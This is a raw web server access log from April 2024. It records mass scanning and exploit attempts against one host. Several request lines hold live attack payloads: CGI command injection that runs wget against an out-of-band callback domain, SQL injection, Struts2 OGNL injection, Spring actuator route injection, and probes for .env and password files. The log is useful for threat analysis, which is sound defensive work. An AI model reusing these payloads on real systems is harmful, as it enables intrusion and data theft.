206.168.34.51 - - [13/Apr/2024 21:01:26] "GET /favicon.ico HTTP/1.1" 404 - 146.19.24.28 - - [13/Apr/2024 21:43:40] "GET / HTTP/1.1" 200 - 64.62.156.80 - - [13/Apr/2024 22:22:44] "GET / HTTP/1.1" 200 - 64.62.156.90 - - [13/Apr/2024 22:24:40] code 404, message File not found 64.62.156.90 - - [13/Apr/2024 22:24:40] "GET /favicon.ico HTTP/1.1" 404 - 64.62.156.81 - - [13/Apr/2024 22:25:15] code 404, message File not found 64.62.156.81 - - [13/Apr/2024 22:25:15] "GET /geoserver/web/ HTTP/1.1" 404 - 45.79.181.251 - - [13/Apr/2024 22:40:12] "GET / HTTP/1.1" 200 - 207.90.244.17 - - [13/Apr/2024 23:01:08] "GET / HTTP/1.1" 200 - 207.90.244.17 - - [13/Apr/2024 23:01:08] code 404, message File not found 207.90.244.17 - - [13/Apr/2024 23:01:08] "GET /robots.txt HTTP/1.1" 404 - 207.90.244.17 - - [13/Apr/2024 23:01:09] code 404, message File not found 207.90.244.17 - - [13/Apr/2024 23:01:09] "GET /sitemap.xml HTTP/1.1" 404 - 207.90.244.17 - - [13/Apr/2024 23:01:09] code 404, message File not found 207.90.244.17 - - [13/Apr/2024 23:01:09] "GET /.well-known/security.txt HTTP/1.1" 404 - 207.90.244.17 - - [13/Apr/2024 23:01:10] code 404, message File not found 207.90.244.17 - - [13/Apr/2024 23:01:10] "GET /favicon.ico HTTP/1.1" 404 - 205.210.31.155 - - [13/Apr/2024 23:22:33] "GET / HTTP/1.1" 200 - 194.50.16.190 - - [13/Apr/2024 23:39:34] "GET / HTTP/1.1" 200 - 59.89.168.196 - - [13/Apr/2024 23:40:35] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [13/Apr/2024 23:53:58] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [14/Apr/2024 00:28:37] "GET / HTTP/1.1" 200 - 46.174.191.30 - - [14/Apr/2024 00:29:02] "GET / HTTP/1.0" 200 - 185.196.9.61 - - [14/Apr/2024 00:35:20] code 404, message File not found 185.196.9.61 - - [14/Apr/2024 00:35:20] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://cnu5g6j332t368874ndgqyx74z3hng588.oast.live;%27 HTTP/1.1" 404 - 185.196.9.61 - - [14/Apr/2024 00:37:58] code 501, message Unsupported method ('POST') 185.196.9.61 - - [14/Apr/2024 00:37:58] "POST /cgi-bin/nightled.cgi HTTP/1.1" 501 - 165.227.46.208 - - [14/Apr/2024 01:22:18] code 400, message Bad request version ('À\\x14À') 165.227.46.208 - - [14/Apr/2024 01:22:18] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03|Orè =þ\x03\x0cv0õk4°\x85\x8b\x8báºB\x9eáØ+\x8a\x01Ã\x8bbíø\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 165.227.46.208 - - [14/Apr/2024 01:22:18] code 400, message Bad request version ('À\\x14À') 165.227.46.208 - - [14/Apr/2024 01:22:18] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x0fAG'\x9e\x96Ìú\x88Ic\x880ýµ'<} 'qÛ\x08\x02Ú\x8bpÅÆ0\x08[\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 165.227.46.208 - - [14/Apr/2024 01:22:19] "GET / HTTP/1.1" 200 - 165.227.46.208 - - [14/Apr/2024 01:22:19] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:19] "GET /form.html HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:20] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:20] "GET /upl.php HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:20] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03\\x8ap:Ð\\x00bÓ¹?|µ\\x94¨+2í_\\x93\\x01±X"B\\x06¨JUî\\x9c\\x90O\\x9b\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 165.227.46.208 - - [14/Apr/2024 01:22:20] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x8ap:Ð\x00bÓ¹?|µ\x94¨+2í_\x93\x01±X"B\x06¨JUî\x9c\x90O\x9b\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 165.227.46.208 - - [14/Apr/2024 01:22:20] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:20] "GET /geoip/ HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:21] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:21] "GET /favicon.ico HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:21] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:21] "GET /1.php HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:22] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:22] "GET /bundle.js HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:22] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:22] "GET /files/ HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:23] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:23] "GET /systembc/password.php HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:23] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:23] "GET /password.php HTTP/1.1" 404 - 165.227.46.208 - - [14/Apr/2024 01:22:23] code 404, message File not found 165.227.46.208 - - [14/Apr/2024 01:22:23] "GET /info.php HTTP/1.1" 404 - 185.196.9.61 - - [14/Apr/2024 02:18:08] code 501, message Unsupported method ('POST') 185.196.9.61 - - [14/Apr/2024 02:18:08] "POST /apisix/batch-requests HTTP/1.1" 501 - 185.196.9.61 - - [14/Apr/2024 02:18:10] code 404, message File not found 185.196.9.61 - - [14/Apr/2024 02:18:10] "GET /api/2dvNUiNjw2RGvCyi2qG3xCNFv8l HTTP/1.1" 404 - 146.19.24.28 - - [14/Apr/2024 02:28:52] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [14/Apr/2024 02:42:15] code 404, message File not found 185.196.9.61 - - [14/Apr/2024 02:42:15] "GET /vcac/ HTTP/1.1" 404 - 185.196.9.61 - - [14/Apr/2024 02:42:18] code 404, message File not found 185.196.9.61 - - [14/Apr/2024 02:42:18] "GET /vcac/?original_uri=http://194.193.213.117:80%2Fvcac HTTP/1.1" 404 - 185.196.9.61 - - [14/Apr/2024 03:21:46] code 404, message File not found 185.196.9.61 - - [14/Apr/2024 03:21:46] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://cnu5g6j332t368874ndg49j3z18w3mrqe.oast.live; HTTP/1.1" 404 - 85.239.33.117 - - [14/Apr/2024 03:47:18] "GET / HTTP/1.1" 200 - 85.239.33.117 - - [14/Apr/2024 03:48:10] code 404, message File not found 85.239.33.117 - - [14/Apr/2024 03:48:10] "GET /.env HTTP/1.1" 404 - 185.196.9.61 - - [14/Apr/2024 03:57:52] code 501, message Unsupported method ('POST') 185.196.9.61 - - [14/Apr/2024 03:57:52] "POST /actuator/gateway/routes/2dvNUdHg8FoVS132IbAqaRlQ8IR HTTP/1.1" 501 - 185.196.9.61 - - [14/Apr/2024 03:57:55] code 501, message Unsupported method ('POST') 185.196.9.61 - - [14/Apr/2024 03:57:55] "POST /actuator/gateway/refresh HTTP/1.1" 501 - 185.196.9.61 - - [14/Apr/2024 03:57:58] code 501, message Unsupported method ('DELETE') 185.196.9.61 - - [14/Apr/2024 03:57:58] "DELETE /actuator/gateway/routes/2dvNUdHg8FoVS132IbAqaRlQ8IR HTTP/1.1" 501 - 122.96.28.133 - - [14/Apr/2024 04:00:56] "GET / HTTP/1.1" 200 - 180.136.232.60 - - [14/Apr/2024 04:01:06] "GET / HTTP/1.1" 200 - 60.13.138.187 - - [14/Apr/2024 04:01:06] code 404, message File not found 60.13.138.187 - - [14/Apr/2024 04:01:06] "GET /favicon.ico HTTP/1.1" 404 - 205.210.31.53 - - [14/Apr/2024 04:26:18] "GET / HTTP/1.0" 200 - 185.180.143.72 - - [14/Apr/2024 04:29:33] "GET / HTTP/1.1" 200 - 61.219.11.155 - - [14/Apr/2024 05:04:33] code 400, message Bad HTTP/0.9 request type ('1ìª\\x04n(äÏ°Ð8DEå\\x9a\\x08ά¯\\x88') 61.219.11.155 - - [14/Apr/2024 05:04:33] "1ìª\x04n(äÏ°Ð8DEå\x9a\x08ά¯\x88\x0c\x1dîn/\x01ÒgN&¿kËä\x8cåñ\x03áu¡ªh\x92\x89\x81LÑ7(ÿÇ\x87v+\x13>/\x06\x8c¯å\x18vÉ¢ï0\x9b\x12\x0eoòm[ð\x90Ë\x82Z\x0e§¨\x89`/\x8e" 400 - 185.224.128.43 - - [14/Apr/2024 05:48:05] "GET / HTTP/1.1" 200 - 194.50.16.190 - - [14/Apr/2024 05:59:57] "GET / HTTP/1.1" 200 - 107.170.239.4 - - [14/Apr/2024 07:05:19] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [14/Apr/2024 07:23:57] "GET / HTTP/1.1" 200 - 185.242.226.99 - - [14/Apr/2024 07:30:36] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [14/Apr/2024 07:54:06] "GET / HTTP/1.1" 200 - 194.120.230.94 - - [14/Apr/2024 08:09:55] "GET / HTTP/1.1" 200 - 162.243.144.10 - - [14/Apr/2024 08:11:13] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 162.243.144.10 - - [14/Apr/2024 08:11:13] "MGLNDD_194.193.213.117_80" 400 - 115.231.78.9 - - [14/Apr/2024 08:23:41] "GET / HTTP/1.1" 200 - 115.231.78.9 - - [14/Apr/2024 08:23:41] "GET / HTTP/1.1" 200 - 115.231.78.9 - - [14/Apr/2024 08:23:42] code 404, message File not found 115.231.78.9 - - [14/Apr/2024 08:23:42] "GET /favicon.ico HTTP/1.1" 404 - 115.231.78.9 - - [14/Apr/2024 08:23:43] code 404, message File not found 115.231.78.9 - - [14/Apr/2024 08:23:43] "GET /robots.txt HTTP/1.1" 404 - 202.26.144.61 - - [14/Apr/2024 08:25:00] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [14/Apr/2024 08:25:33] "GET / HTTP/1.1" 200 - 185.150.26.246 - - [14/Apr/2024 08:45:55] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [14/Apr/2024 09:14:34] code 404, message File not found 185.196.9.61 - - [14/Apr/2024 09:14:34] "GET /mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1 HTTP/1.1" 404 - 198.235.24.65 - - [14/Apr/2024 09:22:11] code 400, message Bad request version ('À\\x13À') 198.235.24.65 - - [14/Apr/2024 09:22:11] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03ã;BþZp8Þf"\x90ê>¿@\x7fáC\x95üÅ\x9aÚbÇd\x939K¶ \x8aëúâ»C\x83È\x97Êõ\x8b\x06V?÷å\x83á\x8d\x93&«ù\x18\x95N¬BÁ\x8eb\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 185.150.26.246 - - [16/Apr/2024 10:39:00] "GET / HTTP/1.1" 200 - 195.140.227.163 - - [16/Apr/2024 10:57:32] code 404, message File not found 195.140.227.163 - - [16/Apr/2024 10:57:32] "GET /manager/html HTTP/1.1" 404 - 194.120.230.95 - - [16/Apr/2024 11:22:26] "GET / HTTP/1.1" 200 - 106.240.234.154 - - [16/Apr/2024 11:26:39] "GET / HTTP/1.1" 200 - 106.240.234.154 - - [16/Apr/2024 11:26:42] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:26:42] "GET /index.action HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:26:45] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:26:45] "GET /login.action HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:26:48] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:26:48] "GET /index.do HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:26:52] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:26:52] "GET /index.jsp HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:26:55] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:26:55] "GET /login.do HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:26:58] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:26:58] "GET /login.jsp HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:01] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:27:01] "GET /main.jsp HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:04] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:27:04] "GET /default.jsp HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:07] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:27:07] "GET /register.jsp HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:10] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:27:10] "GET /login/login.jsp HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:14] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:27:14] "GET /login/indexAction.action HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:17] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:27:17] "GET /indexAction.action HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:27:20] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:20] "POST / HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:23] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:23] "POST /index.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:26] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:26] "POST /login.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:29] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:29] "POST /index.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:33] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:33] "POST /index.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:36] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:36] "POST /login.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:39] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:39] "POST /login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:43] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:43] "POST /main.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:47] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:47] "POST /default.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:50] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:50] "POST /register.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:54] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:54] "POST /login/login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:27:58] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:27:58] "POST /login/indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:02] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:02] "POST /indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:05] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:05] "POST / HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:09] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:09] "POST /index.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:12] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:12] "POST /login.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:16] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:16] "POST /index.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:20] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:20] "POST /index.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:24] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:24] "POST /login.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:28] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:28] "POST /login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:31] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:31] "POST /main.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:35] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:35] "POST /default.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:38] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:38] "POST /register.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:42] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:42] "POST /login/login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:45] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:45] "POST /login/indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:49] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:49] "POST /indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:53] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:53] "POST / HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:28:56] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:28:56] "POST /index.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:00] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:00] "POST /login.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:03] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:03] "POST /index.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:06] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:06] "POST /index.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:09] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:09] "POST /login.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:12] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:12] "POST /login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:15] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:15] "POST /main.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:18] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:18] "POST /default.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:21] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:21] "POST /register.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:24] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:24] "POST /login/login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:27] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:27] "POST /login/indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:30] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:30] "POST /indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:33] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:33] "POST / HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:36] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:36] "POST /index.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:39] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:39] "POST /login.action HTTP/1.1" 501 - 80.82.77.202 - - [16/Apr/2024 11:29:40] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\\x82ÙoÈ¢×\\x93\\x98´ï\\x80å¹\\x90\\x00(À") 80.82.77.202 - - [16/Apr/2024 11:29:40] "\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RHÅ\x1a#÷:Nßâ´\x82/ÿ\x09T\x9f§Äy°hÆ\x13\x8c¤\x1c="á\x1a\x98 \x84´,\x85¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À" 400 - 106.240.234.154 - - [16/Apr/2024 11:29:42] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:42] "POST /index.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:45] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:45] "POST /index.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:48] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:48] "POST /login.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:51] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:51] "POST /login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:54] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:54] "POST /main.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:29:57] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:29:57] "POST /default.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:01] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:01] "POST /register.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:03] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:03] "POST /login/login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:07] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:07] "POST /login/indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:10] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:10] "POST /indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:13] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:13] "POST / HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:17] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:17] "POST /index.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:20] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:20] "POST /login.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:24] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:24] "POST /index.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:27] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:27] "POST /index.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:30] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:30] "POST /login.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:33] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:33] "POST /login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:36] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:36] "POST /main.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:40] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:40] "POST /default.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:43] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:43] "POST /register.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:46] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:46] "POST /login/login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:49] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:49] "POST /login/indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:52] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:30:52] "POST /indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:30:56] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:30:56] "GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:30:59] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:30:59] "GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:02] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:02] "GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:05] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:05] "GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:09] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:09] "GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:12] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:12] "GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 